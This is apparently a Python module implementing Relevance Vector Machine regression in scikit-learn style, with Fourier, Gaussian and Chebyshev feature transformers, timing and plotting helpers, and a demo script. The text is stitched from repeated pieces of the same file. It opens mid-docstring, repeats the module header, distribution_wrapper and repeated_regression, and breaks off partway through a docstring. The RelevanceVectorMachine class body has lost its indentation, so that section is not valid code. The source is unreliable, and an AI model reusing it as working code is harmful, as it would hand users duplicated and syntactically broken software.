    >>> init_alphas = distribution_wrapper(stats.halfnorm(scale=1),single=False)
    """
    def samples(X=None):
        if single:
            return dis.rvs(size=1)[0]
        if isinstance(size, int):
            return dis.rvs(size=size)
        if isinstance(X, np.ndarray):
            return dis.rvs(size=X.shape[1])
        raise ValueError("size is not properly specified")
    return samples
def repeated_regression(x, base_trafo, model_type, model_kwargs, t=None, tfun=None,
                        epsilon=None, Nruns=100, return_coefs=False, return_models=False):
    """Repeat the same regression Nruns times, collecting timings and results.

    Either pass the targets ``t`` directly, or pass both ``tfun`` (callable
    with t = tfun(x)) and ``epsilon`` (scipy.stats-like noise distribution)
    to generate them once before the runs.

    Parameters
    ----------
    x : np.ndarray
        input / estimators
    base_trafo : callable
        e.g. a sklearn.preprocessing transform such as PolynomialFeatures'
        fit_transform, mapping x to the design matrix X
    model_type : regression class like RelevanceVectorMachine
        instantiated freshly for every run with ``model_kwargs``
    model_kwargs : dict
        keyword arguments for ``model_type``
    t, tfun, epsilon : see above
    Nruns : int
        number of repetitions
    return_coefs, return_models : boolean
        select the extra return values

    Returns
    -------
    runtimes : np.ndarray of shape (Nruns,)
        wall-clock seconds per fit, optionally followed by the coefficient
        array (Nruns, n_features) and/or the list of fitted models.
    """
    X = base_trafo(x.reshape((-1, 1)))
    assert t is not None or not (tfun is None and epsilon is None), "Either 't' has to be given or 'tfun' and 'epsilon'!"
    if t is None:
        t = tfun(x) + epsilon.rvs(size=x.shape[0])
    runtimes = np.zeros(Nruns)
    coefs, models = [], []
    for run in range(Nruns):
        start = time.time()
        model = model_type(**model_kwargs)
        model.fit(X, t)
        runtimes[run] = time.time() - start
        if return_coefs:
            coefs.append(model.get_full_weights_vector())
        if return_models:
            models.append(model)
    extras = []
    if return_coefs:
        extras.append(np.array(coefs))
    if return_models:
        extras.append(models)
    if extras:
        return (runtimes,) + tuple(extras)
    return runtimes
def print_run_stats(base_trafo, x, runtimes, coefs, Nruns, show_coefs=True):
    """Print a short report of timing and weight statistics for repeated runs.

    Expects ``runtimes`` of shape (Nruns,) and ``coefs`` of shape
    (Nruns, n_features); spreads are reported as two sample standard deviations.
    """
    print("\n================================================")
    header = "X = {} & Nruns = {}:".format(base_trafo(x.reshape((-1, 1))).shape, Nruns)
    print(header)
    print("-" * len(header))
    print("\ntime: estimate = {:.4f}s, 2*std = {:.4f}s".format(runtimes.mean(), 2 * np.std(runtimes, ddof=1)))
    if not show_coefs:
        return
    print("\ncoefs (estimate +- 2*std):")
    for idx in range(coefs.shape[1]):
        mean_w = coefs[:, idx].mean(axis=0)
        spread_w = 2 * np.std(coefs[:, idx], axis=0, ddof=1)
        print(" {}: {:.4f} +- {:.4f}".format(idx, mean_w, spread_w))
def plot_summary(models, noise, x, t, X, coefs, base_trafo):
    """Plot a 2x2 summary of repeated RVM regressions plus an MSE-curve figure.

    Panels: (1) mean prediction with 95% band vs targets, (2) weight spread,
    (3) model noise precision vs the true noise histogram, (4) prediction-error
    distributions vs the true noise histogram. A second figure shows the MSE
    trace of every model.

    Parameters
    ----------
    models : sequence of fitted RelevanceVectorMachine instances
    noise : np.ndarray
        the true noise realization used to generate t
    x : np.ndarray of shape (n_samples,)
        raw input values
    t : np.ndarray of shape (n_samples,)
        observed targets
    X : np.ndarray
        design matrix corresponding to x
    coefs : np.ndarray of shape (n_models, n_features)
        full weight vectors of all models
    base_trafo : callable
        transformation from raw input to design matrix
    """
    ys = np.array([m.predict(X) for m in models])
    y = ys.mean(axis=0)
    yerr = 2 * ys.std(axis=0, ddof=1)
    fig = plt.figure(figsize=(5, 7))
    # panel 1: summarizing all predictions
    ax = fig.add_subplot(221)
    ax.fill_between(x, y - yerr, y + yerr, label="95%", alpha=0.1, color="red")
    ax.plot(x, t, 'o', label="true", markerfacecolor="None", ms=2., alpha=.75)
    ax.plot(x, y, '-', label="estimate")
    ax.set_xlabel("input")
    ax.set_ylabel("output")
    ax.set_title("y vs t")
    plt.legend(loc=0)
    coef_est = coefs.mean(axis=0)
    coef_err = 2 * coefs.std(ddof=1, axis=0)
    # panel 2: summarizing variation of weights
    ax2 = fig.add_subplot(222)
    ax2.errorbar(np.arange(coef_est.shape[0]), y=coef_est, yerr=coef_err, fmt="o",
                 markerfacecolor="None", label="RVM w", capsize=3.)
    ax2.set_xlabel("weight index")
    ax2.set_ylabel("weights")
    ax2.set_title("Variation of weights")
    plt.legend(loc=0)
    # panel 3: noise precision, model vs true noise
    beta2scale = lambda beta: np.sqrt(2. / beta)
    noise2scale = lambda noise, axis: np.sqrt(2.) * np.std(noise, axis=axis, ddof=1)
    betas = np.array([m.beta_ for m in models])
    ax3 = fig.add_subplot(223)
    # BUG FIX: `normed=True` was removed from Axes.hist in matplotlib 3.1;
    # `density=True` is the equivalent replacement.
    ax3.hist(noise, label="true noise", density=True, bins=100, range=(-5, 5))
    xlim = ax3.get_xlim()
    _xp = np.linspace(xlim[0], xlim[1], 100)
    for model in models:
        norm_rvm = stats.norm(loc=0, scale=beta2scale(model.beta_))
        ax3.plot(_xp, norm_rvm.pdf(_xp), '-k', linewidth=.1)
    ax3.set_xlabel("noise")
    ax3.set_ylabel("frequency")
    ax3.set_title("Noise precision:\nmodel vs true noise")
    ax3.text(-5, .8, "true scale = {:.3f}".format(noise2scale(noise, 0)))
    ax3.text(-5, .3, "est. scale = {:.3f}+-{:.3f}".format(beta2scale(betas).mean(), 2. * beta2scale(betas).std(ddof=1)))
    # panel 4: noise precision, error distribution vs true noise
    ax4 = fig.add_subplot(224)
    bins = 100
    ax4.hist(noise, label="true noise", density=True, bins=bins, range=(-5, 5))
    # NOTE(review): this reads the x-limits of panel 1 (the data domain), not
    # of this panel -- confirm that is intended for the prediction grid below.
    xlim = ax.get_xlim()
    _xp = np.linspace(xlim[0], xlim[1], 100)
    _X = base_trafo(_xp.reshape((-1, 1)))
    pred_noise = []
    for model in models:
        # NOTE(review): predict(_X) has 100 entries while t has len(x) -- this
        # only broadcasts when len(x) == 100; confirm for other sample sizes.
        n = model.predict(_X) - t
        pred_noise.append(n)
        ax4.hist(n, bins=bins, histtype="step", linewidth=.1, density=True, range=xlim, color="k")
    pred_noise = np.array(pred_noise)
    ax4.set_xlabel("noise")
    ax4.set_ylabel("frequency")
    ax4.set_title("Noise precision:\nerr. dis. vs true noise")
    ax4.text(-5, 1., "true scale = {:.3f}".format(noise2scale(noise, 0)))
    ax4.text(-5, .3, "pred scale = {:.3f}+-{:.3f}".format(noise2scale(pred_noise, 1).mean(), noise2scale(pred_noise, 1).std(ddof=1) * 2))
    plt.tight_layout()
    plt.show()
    # second figure: MSE trace of every model
    fig = plt.figure(figsize=(5, 5))
    ax = fig.add_subplot(111)
    for m in models:
        ax.plot(m.mse_, 'k-', alpha=.5, lw=.1)
    ax.set_xlabel("iteration")
    ax.set_ylabel("MSE")
    ax.set_yscale("log")
    ax.set_title("MSE curves of all regressions")
    plt.tight_layout()
    plt.show()
if __name__ == "__main__":
    # Demo: repeat RVM regressions on Fourier design matrices of growing size
    # and print timing / coefficient statistics for each size.
    epsilon = stats.norm(loc=0, scale=0.01)
    tfun = lambda x: np.sin(x) + np.cos(2. * x)
    init_beta = distribution_wrapper(stats.halfnorm(scale=1), size=1, single=True)
    init_alphas = distribution_wrapper(stats.halfnorm(scale=1), single=False)
    Nruns = 100
    N = 100
    Ms = [3, 5, 10, 20, 50]
    for M in Ms:
        x = np.linspace(0, 1, N)
        trafo = FourierFeatures(k=M)
        base_trafo = trafo.fit_transform
        model_type = RelevanceVectorMachine
        model_kwargs = dict(n_iter=250, verbose=False, compute_score=True, init_beta=init_beta,
                            init_alphas=init_alphas)
        # BUG FIX: the original called the undefined name `regression_speedtest`;
        # the function defined in this module with this exact signature is
        # `repeated_regression`.
        runtimes, coefs = repeated_regression(x, base_trafo, model_type, t=None, tfun=tfun, epsilon=epsilon,
                                              model_kwargs=model_kwargs, Nruns=Nruns, return_coefs=True)
        print_run_stats(base_trafo, x, runtimes, coefs, Nruns)
# linear_model: updated documentation
"""
scikit-learn style implementation of Relevance Vector Machine
based regression plus helper functions and example.
Eric Schmidt
e.schmidt@cantab.net
2017-10-20
"""
from __future__ import print_function
from sklearn import linear_model, utils, preprocessing
import sklearn
import numpy as np
from scipy import stats
import time
import matplotlib
import matplotlib.pylab as plt
matplotlib.rc('text', usetex=True)
# BUG FIX: modern matplotlib (>= 3.3) requires `text.latex.preamble` to be a
# single string; the old list-of-strings form is no longer accepted.
matplotlib.rcParams['text.latex.preamble'] = r"\usepackage{amsmath}"
def fun_wrapper(fun, k):
    """Return a callable that evaluates ``fun`` at ``x * k`` (frequency scaling)."""
    def _scaled(x):
        return fun(x * k)
    return _scaled
def dis_wrapper(dis):
    """Adapt a frozen scipy.stats distribution to a plain ``f(x) -> pdf(x)`` callable."""
    def _pdf(x):
        return dis.pdf(x)
    return _pdf
def cheb_wrapper(i, k):
    """Return a callable evaluating the i-th Chebyshev polynomial T_i.

    Builds a length-``k`` coefficient vector (``k`` = total number of
    coefficients, incl. the bias slot) with a single 1 at index ``i`` and
    evaluates it via ``np.polynomial.chebyshev.chebval``.
    """
    coeffs = np.zeros(k)
    coeffs[i] = 1
    def _chebyshev(x):
        return np.polynomial.chebyshev.chebval(x, coeffs)
    return _chebyshev
class GaussianFeatures(sklearn.base.BaseEstimator, sklearn.base.TransformerMixin):
    """Generate Gaussian features.

    Builds a design matrix of ``k`` Gaussian bumps, the first centered at
    ``mu0`` and each subsequent one shifted by ``dmu``, all sharing ``scale``.

    Parameters
    ----------
    k : int, optional, default 10
        The number of Gaussians.
    mu0 : float, optional, default 0
        Center of the first Gaussian.
    dmu : float, optional, default 1
        Spacing between consecutive Gaussian centers.
    scale : float, optional, default 1
        Common scale of all Gaussians.
    include_bias : boolean, optional, default True
        Whether the design matrix includes a bias column.

    Example
    --------
    >>> x = np.linspace(-np.pi,np.pi,100)
    >>> trafo = GaussianFeatures(k=30,mu0=-3,dmu=.2)
    >>> X = trafo.fit_transform(x.reshape((-1,1)))
    """
    def __init__(self, k=10, mu0=0, dmu=1., scale=1., include_bias=True):
        self.k = k
        self.mu0 = mu0
        self.dmu = dmu
        self.scale = scale
        self.include_bias = include_bias

    @staticmethod
    def _basis_functions(n_features, k, include_bias=True, mu0=0., dmu=.5, scale=1.):
        """Return an np.ndarray of k Gaussian pdf callables, optionally with a bias.

        The j-th Gaussian is centered at ``mu0 + j*dmu``; ``n_features`` is
        accepted for interface symmetry with the other transformers but unused.
        """
        gaussians = np.array([dis_wrapper(stats.norm(loc=mu0 + shift * dmu, scale=scale))
                              for shift in range(k)])
        if not include_bias:
            return gaussians
        bias_fn = np.array([lambda x: np.ones(x.shape[0])])
        return np.concatenate((bias_fn, gaussians))

    def fit(self, X, y=None):
        """Compute the number of output features.

        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
            The data.

        Returns
        -------
        self : instance
        """
        _, n_features = utils.check_array(X).shape
        self.n_input_features_ = n_features
        basis = self._basis_functions(n_features, self.k,
                                      self.include_bias, self.mu0, self.dmu, self.scale)
        self.n_output_features_ = len(basis)
        return self

    def transform(self, X):
        """Evaluate every basis function on X and assemble the design matrix.

        Parameters
        ----------
        X : np.ndarray of shape (n_samples, n_input_features)

        Returns
        -------
        XP : np.ndarray of shape (n_samples, n_output_features)
            The design matrix.

        Note
        ----
        Requires prior execution of self.fit.
        """
        sklearn.utils.validation.check_is_fitted(self, ['n_input_features_', 'n_output_features_'])
        X = sklearn.utils.validation.check_array(X, dtype=sklearn.utils.validation.FLOAT_DTYPES)
        if X.shape[1] != self.n_input_features_:
            raise ValueError("X shape does not match training shape")
        basis = self._basis_functions(self.n_input_features_, self.k, self.include_bias,
                                      self.mu0, self.dmu, self.scale)
        design = np.empty((X.shape[0], self.n_output_features_), dtype=X.dtype)
        for column, basis_fn in enumerate(basis):
            design[:, column] = basis_fn(X).ravel()
        return design

    def fit_transform(self, X):
        """Fit to X, then return the transformed design matrix."""
        return self.fit(X).transform(X)
class FourierFeatures(sklearn.base.BaseEstimator, sklearn.base.TransformerMixin):
    """Create the design matrix X from x using the Fourier basis set.

    Parameters
    ----------
    k : int, optional, default 10
        number of basis functions for both sine and cosine, plus the
        possible bias
    include_bias : boolean, optional, default True
        whether or not to include a bias function (function that returns 1)

    Example
    -------
    >>> x = np.linspace(-np.pi,np.pi,100)
    >>> trafo = FourierFeatures(k=10)
    >>> X = trafo.fit_transform(x.reshape((-1,1)))
    """
    def __init__(self, k=10, include_bias=True):
        self.k = k
        self.include_bias = include_bias

    @staticmethod
    def _basis_functions(n_features, k, include_bias):
        """Return sin(m*x) and cos(m*x) callables for m = 1..k-1, optionally with a bias.

        ``n_features`` is accepted for interface symmetry but unused.
        """
        sines = np.array([fun_wrapper(np.sin, freq) for freq in range(1, k)])
        cosines = np.array([fun_wrapper(np.cos, freq) for freq in range(1, k)])
        if not include_bias:
            return np.concatenate((sines, cosines))
        bias_fn = np.array([lambda x: np.ones(x.shape[0])])
        return np.concatenate((bias_fn, sines, cosines))

    def fit(self, X, y=None):
        """Compute the number of output features.

        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
            The data.

        Returns
        -------
        self : instance
        """
        _, n_features = utils.check_array(X).shape
        self.n_input_features_ = n_features
        basis = self._basis_functions(n_features, self.k, self.include_bias)
        self.n_output_features_ = len(basis)
        return self

    def transform(self, X):
        """Evaluate every basis function on X and assemble the design matrix.

        Parameters
        ----------
        X : np.ndarray of shape (n_samples, n_input_features)

        Returns
        -------
        XP : np.ndarray of shape (n_samples, n_output_features)
            The design matrix.

        Note
        ----
        Requires prior execution of self.fit.
        """
        sklearn.utils.validation.check_is_fitted(self, ['n_input_features_', 'n_output_features_'])
        X = sklearn.utils.validation.check_array(X, dtype=sklearn.utils.validation.FLOAT_DTYPES)
        if X.shape[1] != self.n_input_features_:
            raise ValueError("X shape does not match training shape")
        basis = self._basis_functions(self.n_input_features_, self.k, self.include_bias)
        design = np.empty((X.shape[0], self.n_output_features_), dtype=X.dtype)
        for column, basis_fn in enumerate(basis):
            design[:, column] = basis_fn(X).ravel()
        return design

    def fit_transform(self, X):
        """Fit to X, then return the transformed design matrix."""
        return self.fit(X).transform(X)
class ChebyshevFeatures(sklearn.base.BaseEstimator, sklearn.base.TransformerMixin):
    """Create the design matrix X from x using Chebyshev polynomials.

    Parameters
    ----------
    k : int, optional, default 10
        number of basis functions, plus the possible bias
    include_bias : boolean, optional, default True
        whether or not to include a bias function (function that returns 1)

    Example
    -------
    >>> x = np.linspace(-np.pi,np.pi,100)
    >>> trafo = ChebyshevFeatures(k=10)
    >>> X = trafo.fit_transform(x.reshape((-1,1)))
    """
    def __init__(self, k=10, include_bias=True):
        self.k = k
        self.include_bias = include_bias

    @staticmethod
    def _basis_functions(n_features, k, include_bias):
        """Return T_1..T_{k-1} Chebyshev callables, optionally preceded by a bias.

        ``n_features`` is accepted for interface symmetry but unused.
        """
        polynomials = np.array([cheb_wrapper(degree, k) for degree in range(1, k)])
        if not include_bias:
            return polynomials
        bias_fn = np.array([lambda x: np.ones(x.shape[0])])
        return np.concatenate((bias_fn, polynomials))

    def fit(self, X, y=None):
        """Compute the number of output features.

        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
            The data.

        Returns
        -------
        self : instance
        """
        _, n_features = utils.check_array(X).shape
        self.n_input_features_ = n_features
        basis = self._basis_functions(n_features, self.k, self.include_bias)
        self.n_output_features_ = len(basis)
        return self

    def transform(self, X):
        """Evaluate every basis function on X and assemble the design matrix.

        Parameters
        ----------
        X : np.ndarray of shape (n_samples, n_input_features)

        Returns
        -------
        XP : np.ndarray of shape (n_samples, n_output_features)
            The design matrix.

        Note
        ----
        Requires prior execution of self.fit.
        """
        sklearn.utils.validation.check_is_fitted(self, ['n_input_features_', 'n_output_features_'])
        X = sklearn.utils.validation.check_array(X, dtype=sklearn.utils.validation.FLOAT_DTYPES)
        if X.shape[1] != self.n_input_features_:
            raise ValueError("X shape does not match training shape")
        basis = self._basis_functions(self.n_input_features_, self.k, self.include_bias)
        design = np.empty((X.shape[0], self.n_output_features_), dtype=X.dtype)
        for column, basis_fn in enumerate(basis):
            design[:, column] = basis_fn(X).ravel()
        return design

    def fit_transform(self, X):
        """Fit to X, then return the transformed design matrix."""
        return self.fit(X).transform(X)
def full_weight_vector(w, active, inactive):
    """Embed the active RVM weights into a zero-padded full-length vector.

    Parameters
    ----------
    w : float np.ndarray of shape [n_active]
        Weights vector obtained with an RVM containing only non-zero values.
    active : int np.ndarray of shape [n_active]
        Positions of the ``w`` values in the full weights vector.
    inactive : int np.ndarray of shape [n_features - n_active]
        Positions of 0s in the full weights vector.

    Returns
    -------
    w_full : float np.ndarray of shape [n_features]
        Full weights vector.
    """
    total = len(active) + len(inactive)
    w_full = np.zeros(total)
    w_full[active] = w
    return w_full
class RelevanceVectorMachine(linear_model.base.LinearModel,sklearn.base.RegressorMixin):
"""Relevance vector machine regression.
Fits the weights of a linear model. The weights of the model are assumed to
be normally distributed. RVMs also estimate the parameters alpha (precisions
of the distributions of the weights) and beta (precision of the distribution
of the noise) using type-II maximum likelihood or evidence maximization pruning
weights, thus leading to sparse weights vectors.
The algorithm is implemented as described by Faul and Tipping, 2003, AISTAT,
https://pdfs.semanticscholar.org/11f4/d997de8e35a1daf8b115439345d9994cfb69.pdf.
Parameters
----------
n_iter : int
maximum number of iterations
tol : float, optional, default 1.e-3
weights convergence tolerance threshold
compute_score : boolean, optional, default True
whether or not to compute mse and estimate and standard
deviation of the deviation
fit_itnercept : boolean, optional, default True
whether or not to fit the intercept
normalize : boolean, optional, default False
copy_X : boolean, optional, default True
verbose : boolean, optional, default False
init_beta : float or callable, optional, default None
if float needs to be bigger than 0
elif callable then the function needs to return a single value
init_alphas : np.ndarray list or tuple of float or callable, optional, default None
same as for init_beta but for an vector of values
do_logbook : boolean
wether or not to keep the logbook during regression:
logbook = {"L":[],"alphas":[],"beta":[],"weights":[],"weights_full":[],"mse":[],"tse":[],"min":[],"max":[],"Sigma":[],
"dev_est":[],"dev_std":[],"median_se":[]}
Attributes
----------
beta_ : float
noise precision
alphas_ : np.ndarray (n_features,) of float
weight precisions
active : np.ndarray (n_active,) of int
indices to places in the full weights vector to currently active weights
inactive : np.ndarray (n_active,) of int
indices to places in the full weights vector to currently inactive weights
n_iter : int
maximum number of iterations
tol : float
weight covergence tolerance
compute_score : boolean
stores mse_, dev_est and dev_std if true
mse_ : list of float
mean square errors = (t-y)**2/n_samples
dev_est : list of float
estimate of deviation = (t-y)/n_samples
dev_std : list of float
one standard deviation of the deviatons = np.std(t-y,ddof=1)
sigma_ : np.ndarray (n_features,n_features) of float
contains the posterior covariance matrix of p(t|Xw,beta)*p(w|alphas)
do_logbook : boolean
logbook : dict of lists
Example
-------
>>> from linear_model import RelevanceVectorMachine
>>> from sklearn import preprocessing
>>> import numpy as np
>>> from scipy import stats
>>> x = np.linspace(-np.pi,np.pi,100)
>>> x_pred = np.linspace(-np.pi,np.pi,200)
>>> epsilon = stats.norm(loc=0,scale=0.01)
>>> t = np.exp(-x**2) + epsilon.rvs(size=x.shape[0])
>>> k = 5
>>> trafo = preprocessing.PolynomialFeatures(k)
>>> X = trafo.fit_transform(x.reshape((-1,1)))
>>> init_beta = 1./ np.var(t) # (that's the default start)
>>> init_alphas = np.ones(X.shape[1])
>>> init_alphas[1:] = np.inf
>>> model = RelevanceVectorMachine(n_iter=50,verbose=False,compute_score=True,init_beta=init_beta,
... init_alphas=init_alphas)
>>> model.fit(X,t)
RelevanceVectorMachine(compute_score=True, copy_X=True, fit_intercept=True,
init_alphas=array([ 1., inf, inf, inf, inf, inf]),
init_beta=8.2821399938358535, n_iter=50, normalize=False,
tol=0.001, verbose=False)
>>> y, yerr = model.predict(X,return_std=True)
Notes
-----
The notation here is adopted from Tipping 2001, Faul and Tipping 2003 and Bishop's "Pattern
Recognition and Machine Learning" book. No jumping in the sewer!
References
----------
Mike Tipping's favorite implementation: http://www.miketipping.com/downloads.htm
David MacKay's 1992, Bayesian Interpolation
http://www.utstat.toronto.edu/~rsalakhu/sta4273/notes/Lecture2.pdf
http://statweb.stanford.edu/~tibs/sta305files/Rudyregularization.pdf -> Ridge regression and SVD
http://www.statisticshowto.com/wp-content/uploads/2017/07/lecture-notes.pdf -> Ridge regression and SVD and Woodbury
"""
def __init__(self, n_iter=300, tol=1.e-3, compute_score=False,
fit_intercept=False, normalize=False, copy_X=True,
verbose=False,init_beta=None,init_alphas=None,do_logbook=False):
self.n_iter = n_iter
self.tol = tol
self.compute_score = compute_score
self.fit_intercept = fit_intercept
self.normalize = normalize
self.copy_X = copy_X
self.verbose = verbose
self.init_beta = init_beta
self.init_alphas = init_alphas
self.mse_ = []
self.dev_est = [] # deviation estimate
self.dev_std = [] # deviation standard deviation
self.do_logbook = do_logbook
self.logbook = {"L":[],"alphas":[],"beta":[],"weights":[],"weights_full":[],"mse":[],"tse":[],"min":[],"max":[],"Sigma":[],
"dev_est":[],"dev_std":[],"median_se":[]}
@staticmethod
def _initialize_beta(y,init_beta=None,verbose=False):
beta_ = 1. / np.var(y) # default
if not init_beta is None:
if callable(init_beta):
if verbose: print("Setting beta_ = init_beta()")
beta_ = init_beta()
assert beta_ > 0., "init_beta() produced an invalid beta_ value = {}".format(beta_)
elif isinstance(init_beta,(int,float)):
if verbose: print("Setting beta_ = init_beta")
beta_ = np.copy(init_beta)
else:
raise ValueError("Do not understand self.init_beta = {}".format(init_beta))
else:
if verbose:
print("Setting default beta_ = 1/var(t)")
return beta_
@staticmethod
def _initialize_alphas(X,init_alphas=None,verbose=False):
n_samples, n_features = X.shape
alphas_ = np.ones(n_features) # default
alphas_[1:] = np.inf # setting all but one basis function as inactive (see Faul and Tipping 2003 p.4)
if not init_alphas is None:
if callable(init_alphas):
if verbose: print("Setting alphas_ = init_alphas()")
alphas_ = init_alphas(X)
assert (alphas_ > 0.).all(), "init_alphas() produced an invalid alphas_ array = {}".format(alphas_)
elif isinstance(init_alphas,(list,tuple,np.ndarray)):
if verbose: print("Setting alphas_ = init_alphas")
alphas_ = np.copy(init_alphas)
else:
raise ValueError("Do not understand self.init_alphas = {}".format(init_alphas))
else:
if verbose:
print("Setting default alphas_ = [1,inf,inf,...]")
return alphas_
def fit(self, X, y):
"""Fit the model
Parameters
----------
X : numpy array of shape [n_samples,n_features]
Training data
y : numpy array of shape [n_samples]
Target values. Will be cast to X's dtype if necessary
Returns
-------
self : returns an instance of self.
"""
self.mse_ = []
self.dev_est = []
self.dev_std = []
X, y = utils.check_X_y(X, y, dtype=np.float64, y_numeric=True)
X, y, X_offset_, y_offset_, X_scale_ = self._preprocess_data(
X, y, self.fit_intercept, self.normalize, self.copy_X)
self.X_offset_ = X_offset_
self.X_scale_ = X_scale_
n_samples, n_features = X.shape
verbose = self.verbose
# Initialization of the hyperparameters
beta_ = self._initialize_beta(y,init_beta=self.init_beta,verbose=self.verbose)
alphas_ = self._initialize_alphas(X,init_alphas=self.init_alphas,verbose=self.verbose)
self.scores_ = list()
coef_old_ = None
XT_y = np.dot(X.T, y)
# Convergence loop of the RVM regression
for iter_ in range(self.n_iter):
# (in-)active basis functions
active = np.where(np.isfinite(alphas_))[0]
n_active = active.shape[0]
inactive = np.where(np.isinf(alphas_))[0]
# corresponding Sigma matrix (weights hyperprior covariance matrix)
Sigma = np.diag(alphas_)
Sigma_a = np.diag(alphas_[active]) # active part of Sigma -> numpy select?
X_a = X[:,active] # active part of the design matrix
# weights posterior mean (w_new) and covariance (A_new)
A_new = np.linalg.inv(beta_ * X_a.T.dot(X_a) + Sigma_a)
w_new = beta_ * A_new.dot(X_a.T.dot(y))
# mse
dt = y - np.dot(X_a, w_new)
mse_ = np.sum((dt) ** 2)
# Recompute beta
beta_ = (n_features - n_active + np.sum(alphas_[active]*np.diag(A_new)))
beta_ /= mse_
# Compute objective function: Gaussian for p(w|X,t,alphas,beta) \propto p(t|Xw,beta)p(w|alphas)
if self.compute_score:
log_prefactor = n_features*(beta_ - 2.*np.pi) - alphas_[active].sum() - 2.*np.pi
log_likelihood = -beta_ * mse_
log_prior = - w_new.T.dot(Sigma_a.dot(w_new))
log_posterior = .5 * (log_prefactor + log_likelihood + log_prior)
self.scores_.append(log_posterior)
self.mse_.append(float(mse_/n_samples))
self.dev_est.append(dt.mean())
self.dev_std.append(dt.std(ddof=1))
if self.do_logbook:
logbook = {"L":[],"alphas":[],"beta":[],
"weights":[],"weights_full":[],"mse":[],"tse":[],"min":[],"max":[],"Sigma":[],
"dev_est":[],"dev_std":[],"median_se":[]}
if self.compute_score:
self.logbook["L"].append(self.scores_[-1])
else:
log_prefactor = n_features*(beta_ - 2.*np.pi) - alphas_[active].sum() - 2.*np.pi
log_likelihood = -beta_ * mse_
log_prior = - w_new.T.dot(Sigma_a.dot(w_new))
log_posterior = .5 * (log_prefactor + log_likelihood + log_prior)
self.logbook["L"].append(log_posterior)
self.logbook["alphas"].append(alphas_)
self.logbook["beta"].append(beta_)
self.logbook["weights"].append(w_new)
self.logbook["weights_full"].append(full_weight_vector(w_new,active,inactive))
self.logbook["mse"].append(mse_/n_samples)
self.logbook["tse"].append(mse_)
self.logbook["min"].append(np.amin(dt))
self.logbook["max"].append(np.amax(dt))
self.logbook["dev_est"].append(dt.mean())
self.logbook["dev_std"].append(dt.std())
self.logbook["median_se"].append(np.median(dt))
# Check for convergence
if iter_ != 0 and np.sum(np.abs(full_weight_vector(np.copy(w_new),active,inactive) - coef_old_)) < self.tol:
if verbose:
print("Convergence after ", str(iter_), " iterations")
break
elif iter_ == self.n_iter-1:
if verbose:
print("Iteration terminated after n_iter = {} step(s)".format(self.n_iter))
break
coef_old_ = full_weight_vector(np.copy(w_new),active,inactive)
# Compute S and Q (Faul and Tipping 2003 eqs. 24 & 25)
S0_tilde = beta_ * np.einsum("nm,nm->m", X, X) # in R^(n_features)
S1_tilde = - beta_**2 * np.einsum("mn,na->ma",X.T,np.dot(X_a,A_new)) # in R^(n_features x n_active)
S2_tilde = np.einsum("na,nm->am",X_a, X) # in R^(n_active x n_features)
S = S0_tilde + np.einsum("ma,am->m",S1_tilde,S2_tilde)
Q0_tilde = beta_ * np.einsum("nm,n->m", X, y) # in R^(n_features)
Q2_tilde = np.einsum("na,n->a",X_a, y) # in R^(n_active)
Q = Q0_tilde + np.einsum("ma,a->m",S1_tilde,Q2_tilde)
# Compute s and q (note the lower case)
s = np.copy(S)
q = np.copy(Q)
s[active] = alphas_[active]*S[active]/(alphas_[active]-S[active])
q[active] = alphas_[active]*Q[active]/(alphas_[active]-S[active])
# Recompute alphas using pruning
active = np.where(q**2>s)[0]
inactive = np.where(np.logical_not(q**2>s))[0]
alphas_[inactive] = np.inf
alphas_[active] = s[active]**2/(q[active]**2-s[active])
self.coef_ = w_new
self.active = active
self.inactive = inactive
self.sigma_ = A_new
self.beta_ = beta_
self._set_intercept(X_offset_[active], y_offset_, X_scale_[active])
return self
def predict(self, X, return_std=False):
"""Predict using the linear model.
In addition to the mean of the predictive distribution, also its
standard deviation can be returned.
Parameters
----------
X : {array-like, sparse matrix}, shape = (n_samples, n_features)
Samples.
return_std : boolean, optional
Whether to return the standard deviation of posterior prediction.
Returns
-------
y_mean : array, shape = (n_samples,)
Mean of predictive distribution of query points.
y_std : array, shape = (n_samples,)
Standard deviation of predictive distribution of query points.
"""
X_a = X[:,self.active]
y_mean = self._decision_function(X_a)
if return_std is False:
return y_mean
else:
if self.normalize:
X_a = (X_a - self.X_offset_) / self.X_scale_
sigmas_squared_data = (X_a.dot(self.sigma_) * X_a).sum(axis=1)
y_std = np.sqrt(sigmas_squared_data + (1. / self.beta_))
return y_mean, y_std
def get_full_weights_vector(self):
return full_weight_vector(self.coef_,self.active,self.inactive)
def get_logbook(self):
assert self.do_logbook, "Logbook empty because do_logbook = {}.".format(self.do_logbook)
return self.logbook
def distribution_wrapper(dis, size=None, single=True):
    """Wraps scipy.stats distributions for RVM initialization.

    Parameters
    ----------
    dis : frozen scipy.stats distribution (anything exposing ``rvs``)
        Source of the random samples.
    size : int, optional
        How many samples to draw (if given, see 'single').
    single : boolean, optional
        If True, the returned function yields a single float. Otherwise it
        yields an array: either ``size`` samples, or -- when the design
        matrix X is passed to the wrapped function -- one sample per
        column of X (N, M = X.shape).

    Returns
    -------
    samples : callable
        ``samples(X=None)`` drawing from ``dis`` as described above.

    Example
    -------
    >>> init_beta = distribution_wrapper(stats.halfnorm(scale=1),size=1,single=True)
    0.489243101252
    >>> init_alphas = distribution_wrapper(stats.halfnorm(scale=1),single=False)
    [ 0.49100388  0.13933493  2.0644248   0.51169082  1.6274592   0.89930022]
    """
    def samples(X=None):
        # Scalar draw takes priority over everything else.
        if single:
            return dis.rvs(size=1)[0]
        # Vector draw: an explicit size wins, otherwise infer from X's columns.
        if isinstance(size, int):
            return dis.rvs(size=size)
        if isinstance(X, np.ndarray):
            return dis.rvs(size=X.shape[1])
        raise ValueError("size is not properly specified")
    return samples
def repeated_regression(x, base_trafo, model_type, model_kwargs, t=None, tfun=None,
                        epsilon=None, Nruns=100, return_coefs=False, return_models=False,):
    """Repeats regressions.

    Runs ``Nruns`` independent fits of ``model_type`` on the same data,
    timing each fit. Targets are either given directly via ``t`` or
    generated once as ``tfun(x) + noise`` with noise drawn from ``epsilon``.

    Parameters
    ----------
    x : np.ndarray
        input / estimators
    base_trafo : callable
        e.g. an sklearn.preprocessing transform such as PolynomialFeatures,
        mapping x to the design matrix X
    model_type : regression class such as RelevanceVectorMachine
    model_kwargs : dict
        keyword arguments forwarded to the ``model_type`` constructor
    t : np.ndarray, optional
        targets; if None, both ``tfun`` and ``epsilon`` are required
    tfun : callable, optional
        t = tfun(x)
    epsilon : scipy.stats distribution object, optional
